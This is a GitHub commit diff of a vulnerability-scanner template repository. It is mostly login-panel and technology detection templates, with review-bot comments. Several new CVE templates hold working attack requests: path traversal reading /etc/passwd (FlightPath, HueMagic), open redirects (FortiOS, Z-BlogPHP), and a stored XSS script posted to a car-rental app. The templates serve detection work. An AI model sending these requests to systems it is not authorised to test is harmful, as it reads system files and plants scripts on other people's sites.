Merge pull request #2 from projectdiscovery/master

Updation
patch-1
Dhiyaneshwaran 2022-02-01 11:33:14 +05:30 committed by GitHub
commit 0a715c0118
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
69 changed files with 697 additions and 257 deletions


@ -10,7 +10,6 @@
tags:
- "fuzz"
- "dos"
- "misc"
# files is a list of files to ignore template execution
# unless asked for by the user.


@ -0,0 +1,27 @@
id: CVE-2016-3978
info:
name: FortiOS (Fortinet) - Open Redirect and XSS
author: 0x_Akoko
severity: medium
description: The Web User Interface (WebUI) in FortiOS 5.0.x before 5.0.13, 5.2.x before 5.2.3, and 5.4.x before 5.4.0 allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks or cross-site scripting (XSS) attacks via the "redirect" parameter to "login."
reference:
- https://seclists.org/fulldisclosure/2016/Mar/68
- https://nvd.nist.gov/vuln/detail/CVE-2016-3978
tags: cve,cve2016,redirect,fortinet,fortios
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.10
cve-id: CVE-2016-3978
cwe-id: CWE-79
requests:
- method: GET
path:
- '{{BaseURL}}/login?redir=http://www.example.com'
matchers:
- type: regex
part: header
regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)example\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
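Review bot: The `description:` says the issue is reached via the `"redirect"` parameter while the request under `path:` uses `redir=`; one of the two should be corrected so the template documents the parameter it actually exercises, and the advisory listed under `reference:` is the place to confirm which spelling is right. The description also keeps the NVD punctuation with the period inside the quotes (`"login."`); `... via the "redirect" parameter of "login".` reads cleaner. Since the only matcher is a `regex` on `part: header`, a host that performs the redirect through a meta-refresh or script rather than a `Location` header is not reported; a short note in the description that only header-based redirects are detected would set expectations.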


@ -0,0 +1,49 @@
id: CVE-2019-13396
info:
name: FlightPath Local File Inclusion
author: 0x_Akoko,daffainfo
severity: high
description: FlightPath versions prior to 4.8.2 and 5.0-rc2 suffer from a local file inclusion vulnerability.
reference:
- https://www.exploit-db.com/exploits/47121
- https://www.cvedetails.com/cve/CVE-2019-13396/
- https://nvd.nist.gov/vuln/detail/CVE-2019-13396
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
cvss-score: 5.3
cve-id: CVE-2019-13396
cwe-id: CWE-22
tags: cve,cve2019,flightpath,lfi
requests:
- raw:
- |
GET /login HTTP/1.1
Host: {{Hostname}}
- |
POST /flightpath/index.php?q=system-handle-form-submit HTTP/1.1
Host: {{Hostname}}
Accept: application/json, text/plain, */*
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
callback=system_login_form&form_token={{token}}&form_include=../../../../../../../../../etc/passwd
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0:"
- type: status
status:
- 200
extractors:
- type: regex
name: token
part: body
group: 1
internal: true
regex:
- "idden' name='form_token' value='([a-z0-9]+)'>"
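Review bot: The two raw requests target different install roots: the token is fetched with `GET /login` while the form is posted to `/flightpath/index.php?q=system-handle-form-submit`. If FlightPath is served under `/flightpath/`, the first request presumably misses the login page, the `token` extractor finds nothing and the second request goes out without a usable `form_token`, which surfaces as a silent non-match rather than an error; the two paths should be relative to the same root, e.g. `GET /flightpath/login HTTP/1.1`. The extractor pattern `"idden' name='form_token' value='([a-z0-9]+)'>"` begins on a fragment of `hidden'`, which reads like a truncation; `"type='hidden' name='form_token' value='([a-z0-9]+)'>"` states the intent. A one-line comment above `extractors:` saying the value feeds `{{token}}` in the second request would help readers.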


@ -0,0 +1,38 @@
id: CVE-2020-18268
info:
name: Z-BlogPHP 1.5.2 Open redirect
author: 0x_Akoko
severity: medium
description: Open Redirect in Z-BlogPHP v1.5.2 and earlier allows remote attackers to obtain sensitive information via the "redirect" parameter in the component "zb_system/cmd.php."
reference:
- https://github.com/zblogcn/zblogphp/issues/216
- https://www.cvedetails.com/cve/CVE-2020-18268
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.10
cve-id: CVE-2020-18268
cwe-id: CWE-601
tags: cve,cve2020,redirect,zblogphp,authenticated
requests:
- raw:
- |
POST /zb_system/cmd.php?act=verify HTTP/1.1
Host: {{Hostname}}
Content-Length: 81
Content-Type: application/x-www-form-urlencoded
Connection: close
btnPost=Log+In&username={{username}}&password={{md5("{{password}}")}}&savedate=0
- |
GET /zb_system/cmd.php?atc=login&redirect=http://www.example.com HTTP/2
Host: {{Hostname}}
cookie-reuse: true
matchers:
- type: regex
part: header
regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)example\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
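Review bot: The first raw request hard-codes `Content-Length: 81` although its body contains `{{username}}` and `{{md5("{{password}}")}}`, whose expanded length depends on the credentials supplied at run time; if the engine honours the explicit header, the body is truncated or over-read for any username whose length differs from the one the author tested with. Dropping the `Content-Length:` line and letting the client compute it is the safer choice. The second request line reads `GET ... HTTP/2` while the first is `HTTP/1.1`; unless an HTTP/2 request line is intentional here, `HTTP/1.1` keeps the pair consistent. The description also carries the NVD text verbatim with the period inside the quotes (`"zb_system/cmd.php."`).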


@ -29,9 +29,9 @@ requests:
- "Contact Form 7"
part: body
- type: regex
regex:
- '^== Changelog =="'
- type: word
words:
- '== Changelog =='
part: body
- type: regex


@ -0,0 +1,34 @@
id: CVE-2021-25864
info:
name: Hue Magic - Directory Traversal
author: 0x_Akoko
severity: high
description: node-red-contrib-huemagic 3.0.0 is affected by hue/assets/..%2F Directory Traversal.in the res.sendFile API, used in file hue-magic.js, to fetch an arbitrary file.
reference:
- https://github.com/Foddy/node-red-contrib-huemagic/issues/217
- https://www.cvedetails.com/cve/CVE-2021-25864
metadata:
shodan-query: title:"NODE-RED"
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2021-25864
cwe-id: CWE-22
tags: cve,cve2021,huemagic,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/hue/assets/..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2fpasswd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200
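Review bot: The `description:` runs two sentences together — `Directory Traversal.in the res.sendFile API` — and `Traversal.in` reads as a typo; `node-red-contrib-huemagic 3.0.0 is affected by a hue/assets/..%2F directory traversal in the res.sendFile API (hue-magic.js) that lets a remote client fetch arbitrary files.` states the same facts cleanly. The request path mixes `%2F` and `%2f` (`...%2Fetc%2fpasswd`); both decode identically, but a consistent case is easier to compare against the linked issue.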


@ -0,0 +1,111 @@
id: CVE-2021-46005
info:
name: Sourcecodester Car Rental Management System 1.0 - Stored XSS
author: cckuailong
severity: medium
description: Sourcecodester Car Rental Management System 1.0 is vulnerable to Cross Site Scripting (XSS) via vehicalorcview parameter.
reference:
- https://www.exploit-db.com/exploits/49546
- https://nvd.nist.gov/vuln/detail/CVE-2021-46005
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
cvss-score: 5.4
cve-id: CVE-2021-46005
cwe-id: CWE-79
tags: cve,cve2021,xss,sourcecodester,authenticated
requests:
- raw:
- |
POST /admin/ HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
Connection: close
username={{username}}&password={{password}}&login=
- |
POST /admin/post-avehical.php HTTP/1.1
Host: {{Hostname}}
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarypWqYipqU21aYgccv
------WebKitFormBoundarypWqYipqU21aYgccv
Content-Disposition: form-data; name="vehicletitle"
Test
------WebKitFormBoundarypWqYipqU21aYgccv
Content-Disposition: form-data; name="brandname"
1
------WebKitFormBoundarypWqYipqU21aYgccv
Content-Disposition: form-data; name="vehicalorcview"
</script><script>alert(document.domain)</script>
------WebKitFormBoundarypWqYipqU21aYgccv
Content-Disposition: form-data; name="priceperday"
500
------WebKitFormBoundarypWqYipqU21aYgccv
Content-Disposition: form-data; name="fueltype"
Petrol
------WebKitFormBoundarypWqYipqU21aYgccv
Content-Disposition: form-data; name="modelyear"
2022
------WebKitFormBoundarypWqYipqU21aYgccv
Content-Disposition: form-data; name="seatingcapacity"
5
------WebKitFormBoundarypWqYipqU21aYgccv
Content-Disposition: form-data; name="img1"; filename="test.png"
Content-Type: image/png
------WebKitFormBoundarypWqYipqU21aYgccv
Content-Disposition: form-data; name="img2"; filename="test.png"
Content-Type: image/png
------WebKitFormBoundarypWqYipqU21aYgccv
Content-Disposition: form-data; name="img3"; filename="test.png"
Content-Type: image/png
------WebKitFormBoundarypWqYipqU21aYgccv
Content-Disposition: form-data; name="img4"; filename="test.png"
Content-Type: image/png
------WebKitFormBoundarypWqYipqU21aYgccv
Content-Disposition: form-data; name="img5"; filename=""
Content-Type: application/octet-stream
------WebKitFormBoundarypWqYipqU21aYgccv
Content-Disposition: form-data; name="submit"
------WebKitFormBoundarypWqYipqU21aYgccv--
- |
GET / HTTP/1.1
Host: {{Hostname}}
cookie-reuse: true
matchers-condition: and
matchers:
- type: word
part: body
words:
- "</script><script>alert(document.domain)</script>"
- type: word
part: header
words:
- text/html
- type: status
status:
- 200
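Review bot: The second raw request creates a vehicle record whose `vehicalorcview` field holds the script string, and nothing in the template removes it afterwards, so a successful run leaves that record — and the payload rendered on `/` for every later visitor — on the target. That side effect should be spelled out in `description:` (and the template tagged accordingly if the repository has a tag for state-changing templates) so operators can exclude it. The final `GET /` matchers only confirm the literal string and `text/html`; documenting that the check relies on the new record being listed on the front page would also explain why a non-default theme can yield a false negative.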


@ -0,0 +1,24 @@
id: flightpath-panel
info:
name: FlightPath Panel
author: princechaddha
severity: info
metadata:
shodan-query: http.title:"flightpath"
tags: panel,flightpath
requests:
- method: GET
path:
- "{{BaseURL}}/login"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "<title>Login | FlightPath</title>"
- type: status
status:
- 200


@ -1,10 +1,12 @@
id: openam-detect
id: openam-panel
info:
name: Detect OpenAM and OpenSSO
name: OpenAM and OpenSSO Login Panel
author: philippedelteil
severity: info
tags: tech,openam
metadata:
shodan-query: http.title:"OpenAM"
tags: panel,openam,opensso,login
requests:
- method: GET
@ -16,6 +18,7 @@ requests:
- "{{BaseURL}}/sso/XUI"
- "{{BaseURL}}/sso/UI"
- "{{BaseURL}}/sso/UI/#login"
- "{{BaseURL}}/opensso/UI/Login"
- "{{BaseURL}}/openam/UI/login"
- "{{BaseURL}}/openam/UI/#loginlogin"
- "{{BaseURL}}/openam/UI/Login"
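Review bot: Several entries in this `path:` list carry a URL fragment — `{{BaseURL}}/sso/UI/#login` and `{{BaseURL}}/openam/UI/#loginlogin` — and an HTTP client does not transmit the fragment, so on the wire these are the same requests as `/sso/UI/` and `/openam/UI/`; they cost round-trips without adding coverage. `#loginlogin` in particular looks like a typo for `#login`. Either drop the fragment entries or, if a distinct page was meant, use its real path (the list already contains `{{BaseURL}}/openam/UI/Login`). The `path:` list starts before this hunk, so I cannot see the full set.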


@ -1,10 +1,12 @@
id: opensis-detect
info:
name: OpenSIS Detect
name: OpenSIS Login Panel
author: pikpikcu
severity: info
tags: tech,opensis
metadata:
shodan-query: http.title:"openSIS"
tags: panel,opensis,login
requests:
- method: GET
@ -12,6 +14,7 @@ requests:
- "{{BaseURL}}"
- "{{BaseURL}}/opensis/index.php"
stop-at-first-match: true
matchers-condition: and
matchers:
- type: word
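Review bot: The template is turned into a login-panel template (`name: OpenSIS Login Panel`, `tags: panel,opensis,login`) and the workflow hunk later in this commit points at `exposed-panels/opensis-panel.yaml`, yet the `id:` line still reads `id: opensis-detect`, unlike the sibling renames here (`openam-panel`, `openx-panel`, `phpcollab-panel`) which update the id as well. If the file was moved as the workflow reference suggests, `id: opensis-panel` keeps id and filename in step with the repository's convention.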


@ -1,10 +1,12 @@
id: openx-detect
id: openx-panel
info:
name: OpenX detect
name: OpenX Login Panel
author: pikpikcu
severity: info
tags: tech,openx
metadata:
shodan-query: http.title:"OpenX"
tags: panel,openx,login
requests:
- method: GET


@ -1,22 +1,29 @@
id: phpcollab-detect
id: phpcollab-panel
info:
name: PhpCollab detect
name: PhpCollab Login Panel
author: pikpikcu
severity: info
tags: tech,phpcollab
metadata:
shodan-query: http.title:"PhpCollab"
tags: panel,phpcollab,login
requests:
- method: GET
path:
- "{{BaseURL}}/general/login.php"
matchers-condition: and
matchers:
- type: word
part: body
words:
- '<title>PhpCollab</title>'
- type: status
status:
- 200
extractors:
- type: regex
part: body


@ -1,10 +1,12 @@
id: remkon-manager-detect
id: remkon-manager-panel
info:
name: Remkon Device Manager Detect
author: pikpikcu
name: Remkon Device Manager Login Panel
author: pikpikcu,daffainfo
severity: info
tags: remkon,tech,panel
metadata:
shodan-query: http.title:"Remkon Device Manager"
tags: panel,remkon,login
requests:
- method: GET


@ -1,10 +1,12 @@
id: sage-detect
id: sage-panel
info:
name: Sage X3 Detect
author: pikpikcu
name: Sage X3 Login Panel
author: pikpikcu,daffainfo
severity: info
tags: tech,sage
metadata:
shodan-query: http.title:"Sage X3"
tags: panel,sage,login
requests:
- method: GET
@ -13,11 +15,12 @@ requests:
matchers-condition: and
matchers:
- type: word
part: body
words:
- "<title>Sage X3</title>"
- "'/auth/sage-id/registerStart'"
condition: and
- type: status
status:


@ -0,0 +1,31 @@
id: seeddms-panel
info:
name: SeedDMS Login Panel
author: pussycat0x,daffainfo
severity: info
metadata:
shodan-query: http.title:"SeedDMS"
tags: panel,seeddms,login
requests:
- method: GET
path:
- "{{BaseURL}}/out/out.Login.php?referuri=%2Fout%2Fout.ViewFolder.php"
- "{{BaseURL}}/dms/out/out.Login.php?referuri=%2Fout%2Fout.ViewFolder.php"
redirects: true
max-redirects: 2
stop-at-first-match: true
matchers-condition: and
matchers:
- type: word
part: body
words:
- 'href="/out/out.ViewFolder.php">SeedDMS</a>'
- 'href="../out/out.ViewFolder.php?folderid=1">SeedDMS</a>'
condition: or
- type: status
status:
- 200


@ -0,0 +1,33 @@
id: threatq-login
info:
name: ThreatQ login panel
author: idealphase
severity: info
description: ThreatQ serves as an open and extensible threat intelligence platform that allows you to automate the intelligence lifecycle, quickly understand threats, make better decisions and accelerate detection and response
reference: https://www.threatq.com/threat-intelligence-platform/
tags: panel,threatq
requests:
- method: GET
path:
- '{{BaseURL}}/login'
matchers-condition: and
matchers:
- type: word
words:
- '<title ng-bind="PageTitle.getTitle()">ThreatQ</title>'
- '<script src="/assets/js/threatq.min.js'
condition: or
- type: status
status:
- 200
extractors:
- type: regex
part: body
group: 1
regex:
- '<script src="/assets/js/threatq.min.js\?(.*)'
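Review bot: The extractor regex `'<script src="/assets/js/threatq.min.js\?(.*)'` captures greedily to the end of the line, so the extracted value will include the closing quote and whatever follows it (`"></script>` and any further markup) rather than just the query-string value; `'<script src="/assets/js/threatq.min.js\?([^"]+)"'` bounds the capture to the attribute. Naming is also out of step with the other new panel templates in this commit: `id: threatq-login` and `tags: panel,threatq` versus `*-panel` ids and `panel,<name>,login` tags elsewhere. The word matcher has no `part:` line; the engine's default presumably covers the body, but the sibling templates spell out `part: body`.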


@ -0,0 +1,26 @@
id: voipmonitor-panel
info:
name: VoipMonitor panel
author: Yanyun
severity: info
metadata:
shodan-query: http.title:"VoIPmonitor"
tags: panel,voipmonitor,login
requests:
- method: GET
path:
- '{{BaseURL}}'
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "appShareUrl = 'share.voipmonitor.org'"
- "VoIPmonitor"
condition: and


@ -0,0 +1,37 @@
id: wazuh-panel
info:
name: Wazuh Login Panel
author: cyllective,daffainfo
severity: info
description: Wazuh - The Open Source Security Platform
reference: https://github.com/wazuh/wazuh
metadata:
shodan-query: http.title:"Wazuh"
tags: panel,wazuh,login
requests:
- method: GET
path:
- "{{BaseURL}}/app/login"
matchers:
- type: word
part: body
words:
- '&quot;id&quot;:&quot;wazuh&quot;'
- '&quot;title&quot;:&quot;Wazuh&quot;'
- '&quot;icon&quot;:&quot;plugins/wazuh/img/icon_blue.png&quot;'
- '&quot;url&quot;:&quot;/app/wazuh&quot;'
condition: or
- type: status
status:
- 200
extractors:
- type: regex
part: body
group: 1
regex:
- '&quot;version&quot;:&quot;([0-9.]+)&quot;'
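Review bot: `matchers:` holds a `word` matcher and a `status` matcher but there is no `matchers-condition: and` line, so the two are combined with the engine's default; if that default is `or`, any host answering `200` on `/app/login` is reported as a Wazuh panel regardless of body content. The other new panel templates in this commit (`seeddms-panel`, `webmodule-ee-panel`, `xxljob-panel`, `zblogphp-panel`) all place `matchers-condition: and` before `matchers:`; adding the same line here turns the status check into a filter rather than an alternative. The `description:` (`Wazuh - The Open Source Security Platform`) is a tagline; one sentence naming the page and markers being matched would serve readers better.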


@ -0,0 +1,32 @@
id: webmodule-ee-panel
info:
name: Webmodule Login Panel
author: pussycat0x,daffainfo
severity: info
metadata:
google-dork: intitle:"Webmodule" inurl:"/webmodule-ee/login.seam" "Version"
reference: https://www.exploit-db.com/ghdb/7001
tags: panel,webmodule-ee,login
requests:
- method: GET
path:
- "{{BaseURL}}/webmodule-ee/login.seam"
matchers-condition: and
matchers:
- type: word
words:
- "<title>Webmodule</title>"
- type: status
status:
- 200
extractors:
- type: regex
part: body
group: 1
regex:
- 'Version: ([0-9.]+)'


@ -0,0 +1,30 @@
id: xxljob-panel
info:
name: XXLJOB Admin Login Panel
author: pdteam,daffainfo
severity: info
tags: panel,xxljob,login
requests:
- method: GET
path:
- "{{BaseURL}}/xxl-job-admin/toLogin"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "<a><b>XXL</b>JOB</a>"
- type: status
status:
- 200
extractors:
- type: regex
part: body
group: 1
regex:
- '"admin_version":"(.*?)"'


@ -1,10 +1,12 @@
id: yzmcms-detect
id: yzmcms-panel
info:
name: YzmCMS Detect
author: pikpikcu
name: YzmCMS Login Panel
author: pikpikcu,daffainfo
severity: info
tags: yzmcms,tech
metadata:
shodan-query: http.title:"YzmCMS"
tags: panel,yzmcms,login
requests:
- method: GET
@ -13,11 +15,13 @@ requests:
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
part: body
words:
- 'Powered By <a href="http://www.yzmcms.com"'
- 'Powered By YzmCMS'
condition: or
- type: status
status:
- 200


@ -0,0 +1,32 @@
id: zblogphp-panel
info:
name: Z-BlogPHP Panel
author: princechaddha
severity: info
metadata:
shodan-query: http.html:"Z-BlogPHP"
tags: panel,zblogphp
requests:
- method: GET
path:
- "{{BaseURL}}"
matchers-condition: and
matchers:
- type: word
part: body
words:
- '<meta name="generator" content="Z-BlogPHP'
- type: status
status:
- 200
extractors:
- type: regex
part: body
group: 1
regex:
- '<meta name="generator" content="([:A-Z-a-z 0-9.]+)"'
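Review bot: The extractor's character class `[:A-Z-a-z 0-9.]` puts a hyphen between two ranges; I believe Go's RE2 treats that `-` as a literal, but in other engines `Z-a` is read as a range covering `[\]^_` and a reader cannot tell which was intended. `'<meta name="generator" content="([:A-Za-z 0-9.-]+)"'` (hyphen last) expresses the same set unambiguously.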


@ -4,7 +4,7 @@ info:
name: AddEventlistener detection
author: yavolo
severity: info
tags: xss
tags: xss,misc
reference: https://portswigger.net/web-security/dom-based/controlling-the-web-message-source
requests:
@ -14,6 +14,6 @@ requests:
matchers:
- type: word
part: body
words:
- 'window.addEventListener('
part: body


@ -4,7 +4,7 @@ info:
name: Apple app site association for harvesting end points
author: panch0r3d
severity: info
tags: misc
tags: misc,apple
requests:
- method: GET
@ -17,17 +17,17 @@ requests:
matchers-condition: and
matchers:
- type: word
part: body
words:
- 'applinks'
- 'appID'
- 'paths'
part: body
condition: and
- type: word
part: header
words:
- 'application/json'
part: header
- type: status
status:


@ -11,6 +11,7 @@ requests:
- method: GET
path:
- "{{BaseURL}}"
matchers:
- type: word
words:
@ -18,3 +19,4 @@ requests:
- "Index of /"
- "[To Parent Directory]"
- "Directory: /"
condition: or


@ -1,20 +0,0 @@
id: display-via-header
info:
name: Display Via Header
author: geeknik
reference: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Via
severity: info
tags: misc,generic
requests:
- method: GET
path:
- "{{BaseURL}}"
redirects: true
extractors:
- type: regex
part: header
regex:
- "Via:.*"


@ -16,14 +16,14 @@ requests:
matchers:
- type: word
words:
- "# @package Joomla"
- "Joomla"
- "Open Source Matters. All rights reserved"
condition: and
- type: word
part: header
words:
- "text/plain"
part: header
- type: status
status:


@ -21,9 +21,9 @@ requests:
condition: and
- type: word
part: header
words:
- "application/xml"
part: header
- type: status
status:


@ -22,9 +22,9 @@ requests:
condition: and
- type: word
part: header
words:
- "text/plain"
part: header
- type: status
status:


@ -14,7 +14,7 @@ requests:
Host: {{Hostname}}
Authorization: NTLM TlRMTVNTUAABAAAAB4IIAAAAAAAAAAAAAAAAAAAAAAA=
threads: 50
threads: 10
payloads:
path:
- /


@ -16,9 +16,9 @@ requests:
matchers-condition: and
matchers:
- type: word
part: body
words:
- '2022'
part: body
negative: true
- type: regex
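Review bot: The negative word matcher `- '2022'` hard-codes the current year, so from 1 January 2023 every up-to-date site becomes a finding until someone edits the template, whereas the regex matchers that follow (`'© [1-9]\d*'` …) are year-agnostic. If the engine's DSL exposes the current date, deriving the excluded year there removes the annual chore; until then a comment above the line, `# excluded as "up to date" — bump every January`, at least makes the duty visible. The matcher list continues outside this hunk.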
@ -28,10 +28,10 @@ requests:
- '© [1-9]\d*'
- '&copy; [1-9]\d*'
- '&#169; [1-9]\d*'
extractors:
- type: regex
part: body
name: copyright_year
regex:
- 'Copyright [1-9]\d*'
- '© [1-9]\d*'


@ -1,7 +1,7 @@
id: detect-options-method
id: options-method
info:
name: Detect enabled OPTIONS methods
name: Allowed Options Method
author: pdteam
severity: info
tags: misc,generic


@ -9,6 +9,7 @@ requests:
- method: GET
path:
- "{{BaseURL}}/robots.txt"
matchers-condition: and
redirects: true
matchers:
@ -17,9 +18,9 @@ requests:
- "Disallow:"
- type: word
part: header
words:
- text/plain
part: header
- type: dsl
dsl:


@ -10,20 +10,28 @@ info:
requests:
- method: GET
path:
- "{{BaseURL}}/.well-known/security.txt"
- "{{BaseURL}}/security.txt"
- "{{RootURL}}/.well-known/security.txt"
- "{{RootURL}}/security.txt"
stop-at-first-match: true
redirects: true
max-redirects: 3
max-redirects: 2
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "Contact:"
condition: and
- type: dsl
dsl:
- "len(body) <= 1024 && len(body) > 0"
condition: and
extractors:
- type: regex
group: 1
regex:
- '(?mi)Contact:(.*)'
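Review bot: The `dsl` matcher `len(body) <= 1024 && len(body) > 0` rejects any security.txt larger than 1 KiB, which a legitimate file can easily exceed (several `Contact:`/`Encryption:`/`Policy:` fields plus a PGP signature block, all of which the format allows), so those hosts are silently not reported. If the cap is meant to filter HTML error pages, a larger limit or a negative check for `<html` is more selective. `condition: and` on the single-entry `words:` and `dsl:` lists is a no-op and can go. The `Contact:` word match is case-sensitive unless told otherwise while the extractor uses `(?mi)`; aligning the two avoids a match-without-extract or extract-without-match split.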


@ -1,25 +0,0 @@
id: tabnabbing-check
info:
name: Reverse Tabnabbing
author: bolli95
severity: info
tags: misc
reference:
- https://owasp.org/www-community/attacks/Reverse_Tabnabbing
- https://www.youtube.com/watch?v=TMKZCHYmtD4
- https://hackerone.com/reports/211065
requests:
- method: GET
path:
- "{{BaseURL}}"
matchers-condition: and
matchers:
- type: dsl
dsl:
- 'regex("<a[A-z0-9\/\"\&\=\%\#\.\:\_\@\\\$ ]*target\=\"_blank\"[A-z0-9\/\"\&\%\=\#\.\:\_\@\\\$ ]*>", replace_regex(replace_regex(body, "<a[A-z0-9\/\"\&\=\%\#\.\:\_\@\\\$ ]*target\=\"_blank\"[A-z0-9\/\"\&\%\=\#\.\:\_\@\\\$ ]*(rel=\"noopener noreferrer\"|rel=\"noreferrer noopener\"|rel=\"noreferrer\"|rel=\"noopener\")[A-z0-9\/\"\&\%\=\#\.\:\_\@\\\$ ]*>", ""), "<a[A-z0-9\/\"\&\=\%\#\.\:\_\@\\\$ ]*(rel=\"noopener noreferrer\"|rel=\"noreferrer noopener\"|rel=\"noreferrer\"|rel=\"noopener\")[A-z0-9\/\"\&\%\=\#\.\:\_\@\\\$ ]*target\=\"_blank\"[A-z0-9\/\"\&\%\=\#\.\:\_\@\\\$ ]*>", "")) || regex("window\.open\\([^,]+\\)", body)'
- type: dsl
dsl:
- "!contains(tolower(all_headers), 'referrer-policy: no-referrer')"


@ -15,9 +15,9 @@ requests:
matchers:
- type: word
name: trace-request
part: body
words:
- "TRACE / HTTP"
part: body
- method: OPTIONS
path:
@ -26,6 +26,6 @@ requests:
matchers:
- type: regex
name: options-request
part: header
regex:
- "(?i)Allow: [A-Z,]*TRACE"
part: header


@ -0,0 +1,36 @@
id: apollo-server-detect
info:
name: Apollo Server GraphQL introspection detection
author: idealphase
severity: info
description: Apollo Server is a community-maintained open-source GraphQL server. It works with many Node.js HTTP server frameworks, or can run on its own with a built-in Express server. Apollo Server works with any GraphQL schema built with GraphQL.js--or define a schema's type definitions using schema definition language (SDL).
reference: https://github.com/apollographql/apollo-server
tags: apollo,tect,graphql
requests:
- method: POST
path:
- "{{BaseURL}}/graphql"
headers:
Content-Type: application/json
body: |
{"query":"query IntrospectionQuery{__schema{queryType{name}mutationType{name}subscriptionType{name}types{...FullType}directives{name description locations args{...InputValue}}}}fragment FullType on __Type{kind name description fields(includeDeprecated:true){name description args{...InputValue}type{...TypeRef}isDeprecated deprecationReason}inputFields{...InputValue}interfaces{...TypeRef}enumValues(includeDeprecated:true){name description isDeprecated deprecationReason}possibleTypes{...TypeRef}}fragment InputValue on __InputValue{name description type{...TypeRef}defaultValue}fragment TypeRef on __Type{kind name ofType{kind name ofType{kind name ofType{kind name ofType{kind name ofType{kind name ofType{kind name ofType{kind name}}}}}}}}"}
matchers-condition: and
matchers:
- type: word
part: header
words:
- "Content-Type: application/json"
- type: word
part: body
words:
- "GraphQL introspection is not allowed by Apollo Server"
- type: status
status:
- 400
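Review bot: The template only matches when introspection is disabled — it requires status `400` and the body text `GraphQL introspection is not allowed by Apollo Server` — so a deployment with introspection enabled (which would answer `200` with the schema) is not detected, yet `name:` calls it `Apollo Server GraphQL introspection detection`. Rename or describe it as an Apollo Server fingerprint that relies on the introspection-denied error, and state in `description:` that servers with introspection enabled will not match; the current description is vendor copy and says nothing about what is checked. `tags: apollo,tect,graphql` has a typo — `tech`, as every other technology template in this commit uses: `tags: apollo,tech,graphql`. The header matcher `Content-Type: application/json` is compared case-sensitively against the header text; if the engine preserves the server's casing, a `content-type: application/json` response slips through.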


@ -13,7 +13,7 @@ requests:
- "{{BaseURL}}"
redirects: true
max-redirects: 2
max-redirects: 3
matchers-condition: or
matchers:
- type: dsl


@ -14,12 +14,15 @@ requests:
matchers-condition: and
matchers:
- type: word
part: body
words:
- '"description" :"The Pega API'
- type: status
status:
- 200
- type: word
part: header
words:
- 'application/json'
part: header


@ -29,4 +29,4 @@ requests:
part: body
group: 1
regex:
- 'PHP\-Proxy<\/a> ([0-9.]+)<\/div>'
- '<meta name="version" content="([0-9.]+)">'


@ -16,9 +16,9 @@ requests:
- type: word
part: body
words:
- default
- my_id
- root_url
- "default"
- "my_id"
- "root_url"
condition: and
- type: status


@ -18,6 +18,7 @@ requests:
- "<title>Ticket BBCode editor - SCEditor</title>"
- 'title="SCEditor"'
condition: and
- type: status
status:
- 200


@ -1,21 +0,0 @@
id: seeddms-detect
info:
name: Seeddms-
author: pussycat0x
severity: info
tags: tech
requests:
- method: GET
path:
- "{{BaseURL}}/out/out.Login.php?referuri=%2Fout%2Fout.ViewFolder.php"
redirects: true
max-redirects: 2
matchers-condition: and
matchers:
- type: word
words:
- "<title>SeedDMS: Sign in</title>"
- type: status
status:
- 200


@ -5,10 +5,10 @@ info:
author: cyllective
severity: info
description: Detects Shopware CMS
tags: tech,shopware,cms
reference:
- https://github.com/shopware/shopware
- https://github.com/shopware/platform
tags: tech,shopware,cms
requests:
- method: GET
@ -16,12 +16,17 @@ requests:
- "{{BaseURL}}/admin"
- "{{BaseURL}}/backend"
matchers-condition: and
matchers:
- type: word
part: body
condition: or
words:
- 'Realisiert mit Shopware'
- 'Realised with Shopware'
- 'Shopware Administration (c) shopware AG'
- '<title>Shopware 5 - Backend (c) shopware AG</title>'
- '<title>Shopware 5 - Backend (c) shopware AG</title>'
condition: or
- type: status
status:
- 200
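Review bot: `'<title>Shopware 5 - Backend (c) shopware AG</title>'` appears twice on consecutive lines of the `words:` list; the rendered view carries no side marker, but if both lines are on the new side one entry is redundant and should be dropped. `condition: or` likewise appears twice in this hunk, before and after the list — presumably the old and new position of the same key, but if both survive the second is a duplicate key that most YAML parsers resolve silently by last-wins, so the rendered file is worth a look.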


@ -1,22 +1,32 @@
id: strapi-cms-detect
info:
name: strapi CMS detect
author: cyllective
name: Strapi CMS detect
author: cyllective,daffainfo
severity: info
description: Detects strapi CMS
description: Open source Node.js Headless CMS to easily build customisable APIs
reference: https://github.com/strapi/strapi
tags: tech,strapi,cms
reference:
- https://github.com/strapi/strapi
requests:
- method: GET
path:
- "{{BaseURL}}/admin/auth/login"
- "{{BaseURL}}/admin/init"
matchers:
- type: word
part: body
condition: or
words:
- '<title>Strapi Admin</title>'
- '"data"'
- '"uuid"'
- type: status
status:
- 200
extractors:
- type: regex
part: body
group: 1
regex:
- '"strapiVersion":"([0-9.]+)"'
